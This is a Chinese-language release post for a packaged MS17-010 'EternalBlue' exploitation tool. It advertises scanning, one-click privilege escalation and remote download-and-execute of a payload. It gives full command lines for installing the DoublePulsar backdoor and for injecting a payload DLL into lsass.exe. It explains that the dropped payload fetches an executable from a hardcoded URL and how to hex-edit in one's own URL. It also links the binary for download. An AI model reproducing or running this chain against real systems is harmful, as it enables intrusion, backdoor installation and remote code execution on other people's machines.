说明:

这是一款 MS17-010 SMB 远程命令执行漏洞利用工具,这是之前泄露的NSA黑客武器库中“永恒之蓝”攻击程序发起的网络攻击事件使用的exploit;

为什么要重复造轮子?

网上已经有大量复现漏洞的文章而且利用步骤繁琐,且对运行环境也有要求。我所开发的这款图形工具正是解决了这个问题,支持WIN7以上系统免运行环境;内嵌扫描验证漏洞功能,一键提权下载利用。还可批量

测试



* 支持系统
从虚拟机搭建各种版本的系统,经过扫描测试对WIN2008 WIN7 完美测试成功 ,WIN XP . WIN 8 . WIN2003 .能够检测出风险但本机测试未能成功 ·问题未知?
* 扫描模式
多线程,支持内网与外网;外网扫描可能没多大意义,因大多数运营商已经封掉 445 端口;防火墙也能够轻松抵挡此攻击

注意

  • 该程序无后门,自行检查 x64(x86).dll文件,根据对应操作系统位数会释放在目标主机C盘根目录 命名为WIN.EXE文件以管理员运行最高权限。 dll 文件只有下载和重启功能

  • dll文件会执行两个下载地址 , “http://111111.33322.net:33/123.exe” 为预留地址,是不可修改是程序预留修改字符,否则导致工具不能正常使用。
    可使用工具十六进制搜索此字符http://111111.33322.net:33/12345.exe进行修改自己的下载地址

  • 安全软件会对此报毒,所以您不放心可以使用沙箱,虚拟机技术来运行

命令行

支持命令行

  • 扫描漏洞
    MS_17_010_Scan.exe
    -ip [ipaddr] [optional ipaddr end]
    -file [ip file path]

  • 安装后门
    Eternalblue-2.2.0.exe --InConfig Eternalblue-2.2.0.xml --TargetIp 127.0.0.1 --TargetPort 445 --Target WIN72K8R2

  • 远程执行

Doublepulsar-1.3.1.exe --InConfig Doublepulsar-1.3.1.xml --TargetIp 127.0.0.1 --TargetPort 445 --Protocol SMB --Architecture x64 --Function RunDLL --DllPayload x64exe.dll --payloadDllOrdinal 1 --ProcessName lsass.exe --ProcessCommandLine "" --NetworkTimeout 60

下载地址:

链接:https://pan.baidu.com/s/1P_8SEj_bsWWJ8hCNom_7Ug 密码:7w8x

把文件 MS17.exe 下载后打开选择目录进行解压
* 文件结构

MS_17_010_Scan.exe 漏洞验证扫描 支持命令 参见 -h
MS17-010-scan_GUI.exe 主程序

获取授权 (授权截止到 6.1日 过期)

为防止程序传播泛滥,非法利用;一个授权文件只能激活一台设备。
如何授权:
* 下载打开 MS17-010-scan_GUI.exe 主程序 ,会弹出机器码窗口;机器码会自动复制到剪切板

* 把机器码 复制发送至 微信公众号 “安全猎人” ,即可获得授权文件 MS17-010-scan_GUI.key;下载复制该文件与 MS17-010-scan_GUI.exe 主程序 同一目录即可运行

免责声明

请详细阅读安全猎人网站底部免责声明一页

任何事情都有两面性,黑客既可以恶意攻击破坏,同样可以利用自己的技术找到系统漏洞,缺陷等,然后通知相关企业维修得到更好的保护。